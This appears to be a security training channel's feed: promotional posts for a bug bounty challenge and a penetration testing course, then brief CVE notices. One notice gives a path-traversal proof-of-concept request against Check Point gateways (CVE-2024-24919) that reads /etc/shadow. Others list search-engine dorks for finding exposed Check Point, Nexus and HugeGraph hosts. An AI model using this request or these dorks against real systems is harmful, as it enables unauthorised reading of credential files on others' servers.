🚨Ready to level up your cybersecurity skills and earn rewards?

📢Join our 30-day bug bounty challenge and learn the art of bug bounty hunting!

😉Over 30 days, you'll receive daily tasks to help you master:

Information gathering and reconnaissance
Vulnerability identification and exploitation
Web application security testing
API security testing
Cloud security testing
Fuzz testing
Machine learning and AI in security
Business logic vulnerabilities
Deserialization vulnerabilities
Server-side request forgery (SSRF)

👌Plus, you'll get access to resources and references to help you along the way!

📝Complete the challenge and earn a Certificate of Completion to showcase your skills!

💖Join the community and start your journey to cybersecurity mastery today!

🔗Join Now: https://nas.io/brutsecurity/challenges/bug-bounty-blitz-30-days-of-learning

🚀 Advance Your Career in Cybersecurity with Our Comprehensive VAPT Course! 🚀

🚨Are you ready to become a cybersecurity expert? Enroll in our Vulnerability Assessment and Penetration Testing (VAPT) course and gain the skills you need to protect critical systems and data.

📢Key Features:

🔸Live Trainer-Led Online Training: Engage in interactive sessions led by experienced cybersecurity professionals.

🔸50 Hours of Classes Over 3 Months: Comprehensive coverage of VAPT topics, allowing for in-depth learning and mastery.

🔸70% Practical Oriented: Emphasis on hands-on labs and real-world scenarios to ensure you can apply what you learn.

🔸Pay in 2 Installments: Flexible payment options to suit your financial needs.

🔸Career Oriented Training: Focused on building the skills needed for a successful career in cybersecurity.

🔸2 Practical Assignments & 1 Capture The Flag (CTF) Exam: Practical assessments to test and enhance your skills.

👉 Register Now: https://wa.me/message/NQLPOBIAEFDBN1

🚨CVE-2024-24919🚨

💥Shodan Dork: noscript:"Check Point" ssl:"target"

🤠POC:

POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

🚨Go Dork – The Fastest Dork Scanner🚨

👉Searching for relevant things on the Internet is always challenging work. Sometimes we don’t get desired results for our query or question. So to solve this problem, there is a concept of Dorking.

🔗Github: https://github.com/dwisiswant0/go-dork

🚨Check Point Quantum Gateway - CVE-2024-24919🚨

👉CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.

🔗Github POC: https://github.com/seed1337/CVE-2024-24919-POC

🚨Adobe Coldfusion XSS - CVE-2023-44352🚨

👉Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
.
.
.
🔗poc: https://buff.ly/3V2F8tD

"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"

🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨

⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.

👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"

POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956

CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.

💥POC: https://lnkd.in/g_v4h7Cg

👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.noscript:"HugeGraph"